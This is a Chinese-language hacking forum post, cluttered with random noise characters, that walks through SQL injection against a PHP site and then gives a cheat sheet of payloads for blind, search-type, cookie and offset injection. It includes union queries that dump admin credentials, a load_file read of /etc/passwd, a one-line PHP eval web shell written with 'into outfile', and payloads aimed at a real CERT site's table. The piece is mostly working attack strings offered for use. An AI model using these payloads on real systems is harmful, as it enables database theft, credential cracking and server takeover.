我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~; G3 E8 {# a) z7 V
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
8 G9 Y0 f6 x+ N4 n7 e5 l* d+ L我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。- F) `# Q2 P0 ~' R
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)8 u) m. ?$ e8 |0 g9 S( s5 @
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)& C6 H# B/ D6 Q$ Q. M* w
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:8 h! Y" _9 _9 |, n2 x- G
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in3 p+ ?" L! L7 a; M8 Y" G3 `3 f
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入2 x# { ?/ n2 g9 t( _, ^' a/ ]
; c- V9 |4 J. S
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,8 W6 Y" ]1 i, Q' e, ]# b* ]
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3 ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
. u8 i+ g$ E; S: ]4 v6 K3 \4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
( @+ K6 j: N2 @5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。
, L! Y) F, X; J$ L& t/ o. q有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,! M- E7 @7 I2 F7 o
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
. O# C; o& d* q" z我就用的是第二个思路,( o4 X3 C5 l! K# t% R
提交and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=database() limit 0,1-- / l! g3 \3 u P
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,% r! {. z" I" E3 x; T
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
. G2 W" R$ b( q5 G9 z注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
: v) Q- H* T p3 ^* I6 R7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
3 n, c8 T6 T/ Y& j- b E/ @是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
& V% b- k2 ?) K提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --1 o. F, J' R* T9 o# H& @* f$ r, F- J
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,, Z( {2 s4 _- Y G
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
* @/ v! F/ C3 y5 O/ V5 w1 t下面是一些很普遍注入方式资料:1 @; A. a) b, W. } v; E P
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='% c& u6 x+ b* B" T' `% c* K( C
拆半法
- P! W ?( m7 w+ L* F) u3 d7 y######################################
" L- k$ T9 z ^, @1 W1 xand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。- o$ t- o$ v/ t2 }& r) B
and exists (select * from admin)# Z2 M( }5 Y: u s" ^" A
and exists(select id from admin)( P* e8 V* G" p- Y% _2 O
and exists(select id from admin where id=1)
' T% q# T. I' p; x/ K$ Qand exists(select id from admin where id>1) 8 u6 F/ ]# ~. ]( _" {$ a
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 j5 o: U! g$ j- U7 r- |. n
and exists (select username from admin)- a) T$ f$ B5 A2 V6 D' F8 `
and exists (select password from admin)8 e/ r' n: u( ~, Y
and exists (select id from admin where len(username)<10 and id=1)& g F; O5 [ H- ^
and exists (select id from admin where len(username)>5 and id=1)
% Y9 w( f* b1 F0 ^0 J$ h# Land exists (select id from admin where len(username)=6 and id=1)4 ?+ O* I5 s2 I) H6 @6 N
and exists (select id from admin where len(password)<10 and id=1)
8 T2 X8 W }( x9 {. V3 j: P5 U( Tand exists (select id from admin where len(password)>5 and id=1)/ H6 ]" \( W/ M1 R4 |; R
and exists (select id from admin where len(password)=7 and id=1)/ D! U. U( z, V0 l* \( \
and (select top 1 asc(mid(username,1,1)) from admin)=97; U% c4 V( O2 c/ q) d- l
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。& C) ]4 T+ j4 d" i: `- L& n# z
猜第二位把username,1,1改成username,2,1就可以了。! D3 d" ?% w- u, `5 S# P3 C+ w5 R
猜密码把username改成password就OK了
9 N; `' g+ J8 m3 i; ^3 q9 \0 G##################################################
: X' |" a2 @; h! B n3 w" g3 F搜索型注入0 [) T2 J3 r: k& O2 T! T0 m/ k/ m" `
##################################% F$ B( [* @1 u( g! F: q
%' and 1=1 and '%'='
" D4 Y( z8 g! e; |%' and exists (select * from admin) and '%'='- N+ V2 }2 W8 D" Q4 U
%' and exists(select id from admin where id=1) and '%'=' }, n$ u R$ p7 B
%' and exists (select id from admin where len(username)<10 and id=1) and '%'=': p" Z) a/ `; w" f7 ]
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='+ R# G5 \0 q" i, M! }, ?
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='% L6 m7 b0 }) K' ^
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
7 N' w- j5 D0 y& j对于MSSQL数据库,后面可以吧 and '%'='换成--
* R, D& G& ?& B( `还有一点搜索型注入也可以使用union语句。
5 o" ]. E5 u8 a2 }( U# ~1 a3 C########################################################
' z9 S# i5 p; \! B% d- N联合查询。
! i% {: N$ O3 V#####################################
+ Z' N1 h8 L; J7 _5 Q2 o( [3 Torder by 10
3 e& U! r' U7 `: V/ r: ^$ Kand 1=2 union select 1,2,3,4,5,6,7,8,9,10
6 x: R6 X, J8 W( B; c9 K1 T: [and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin$ m9 }- p6 q/ V$ J$ c
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=11 v3 E% O7 ? _0 F3 q& H6 `" b
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
/ Z# V/ K7 n: [2 s- e% t###################################
, U$ D4 u9 ]7 D% U, J# v: [cookie注入 X9 H8 e7 c$ D& ^
###############################3 {) C1 h- I$ V
http://www.******.com/shownews.asp?id=127
( D4 Z7 X" [) b: ~; j- U5 Shttp://www.******.com/shownews.asp% G; s0 u- H$ i2 q( z2 ~
alert(="id="+escape("127"));
s6 k$ H/ o1 L$ z7 a- {alert(="id="+escape("127 and 1=1"));3 k. s l$ a4 K( l' h
alert(="id="+escape("127 order by 10"));
2 R+ [! `# q3 w& I( |' walert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));' r$ K" y" r: v
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
' [% W# g" E1 q. y6 Y% D- w这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
1 Z: f4 }5 [ i+ g0 V# f5 j; N###################################
( t3 K4 M. X1 y) G c* Q偏移注入& a1 V6 y T/ i9 [
###########################################################
1 ^# U* s; t2 |' H% e* T4 Bunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin9 G# N; D% @- ~5 Y
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin8 _2 O" F6 O. S' y6 u/ {: R" {5 H
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id); b# e+ v5 t# ^( C- b
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)7 {8 ^5 E% n- R/ j* L% J* D( J9 d! l
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)( e o) t# ~. H* D9 [, {5 A9 r
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)) f- O0 O9 v; s0 I
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on5 o( G( k) D( M
a.id=d.id)5 K' {/ j9 L: `$ m
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)' [! r" O! K6 j9 W
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
' G6 X" m X$ q5 _4 ~
4 Q X, O) e& n- ^============================================================================================================ q. U7 S4 u6 m' T
1.判断版本
+ q; ]9 }. {2 j9 Kand ord(mid(version(),1,1))>51
- ]. s! v; m( ?" H" a返回正常,说明大于4.0版本,支持ounion查询
; I6 A$ j- ] O9 h7 k6 A4 V) E2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解% c |1 p$ Q# g% ?0 m# |
and 2=4 union select 1,2,3,4,5,6,7,8,9--
2 A3 P! X3 e4 R# l/ B6 ^$ R3.查看数据库版本及当前用户,
; f3 y: Y% e' Q% K; x1 R0 Hand 2=4 union select 1,user(),version(),4,5,6,7,8,9--
: t, `- U7 e: {$ _- u' a4 h$ p数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,+ ^1 C3 h9 [. _$ q7 f3 G
4.判断有没有写权限, P: \7 ^1 H5 d4 r7 e! I
and (select count(*) from MySQL.user)>0-- 0 f! ?: u3 T: j o- V: y' \' O6 }
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
. G! H1 i/ o* Z1 X4 K2 E0 M3 v5 a用不了这个命令,就学习土耳其黑客手法,如下3 I* w' v/ w! o! s
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--: M* M5 g# N5 p7 {: D: U8 l" v
6.爆表,爆库
# H6 O' p6 E( C" m4 O& e/ Kand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
# B+ O, r1 e7 h2 ?/ b( F7.爆列名,爆表
0 W, \4 P6 U: U& ~! rand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--3 Q# ]) H4 y9 W+ N1 W5 H
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。- E( w" G/ I0 G J
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--, L. x& b+ b" J$ k; v: m J
9.爆字段内容
5 _; o8 v4 `. R+ G0 w0 q J' Jand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
' G0 M" w, H9 ~- `& v4 y7 Bhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- |